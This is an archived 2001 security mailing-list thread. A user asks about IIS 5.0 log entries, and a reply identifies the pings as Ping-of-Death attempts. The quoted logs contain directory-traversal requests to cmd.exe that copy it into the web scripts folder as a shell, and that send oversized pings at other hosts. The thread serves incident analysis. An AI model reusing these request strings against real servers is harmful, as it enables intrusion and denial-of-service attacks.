Re: Unicode Logs with Ping Activity

From: Vitaly Osipov (vosipovat_private)
Date: Wed Jul 11 2001 - 08:32:11 PDT


    Those pings are Ping-of-Death attempts with TOS (Type Of Service)
    options - I don't know why options were used - maybe this increases the
    possibility of crashing the destination machine...
    
    
    
    myrddin_eat_private wrote:
    > 
    > Would like someone to help me understand what is going on here... The 502
    > error at the end of these entries would indicate failures, wouldn't
    > they? I've been all through the logs on this box, and even though every
    > attempt to copy c:\winnt\system32\cmd.exe to c:\inetpub\scripts\shell.exe
    > shows a 502, it is there.
    > 
    > I'm looking at the times on the log entries and guessing that this was a
    > manual attack.
    > 
    > Also, can someone please explain what is being attempted with these pings?
    > aaa.aaa.aaa.aaa
    > bbb.bbb.bbb.bbb
    > ccc.ccc.ccc.ccc.ccc
    > ddd.ddd.ddd.ddd.ddd
    > are all unique addresses.
    > 
    > #Software: Microsoft Internet Information Services 5.0
    > #Version: 1.0
    > #Date: 2001-06-19 18:44:15
    > #Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
    > 2001-06-19 18:44:15 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+copy+c:\winnt\system32\cmd.exe+c:\inetpub\scripts\shell.exe 502 -
    > 2001-06-19 19:24:28 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+ip-header-bad%20-n+300+-l+65500+-w+0+ccc.ccc.ccc.ccc 502 -
    > 2001-06-19 19:31:42 aaa.aaa.aaa.aaa - bbb.bbb.bbb.bbb 80 GET /scripts/../../winnt/system32/cmd.exe /c+ping+-v+host-precedence-violation%20-n+300+-l+65500+-w+0+ddd.ddd.ddd.ddd 502 -
    > ----------------------------------------------------------------------------
    > 
    > This list is provided by the SecurityFocus ARIS analyzer service.
    > For more information on this free incident handling, management
    > and tracking system please see:
    > 
    > http://aris.securityfocus.com
    
    
    



    This archive was generated by hypermail 2b30 : Wed Jul 11 2001 - 13:29:09 PDT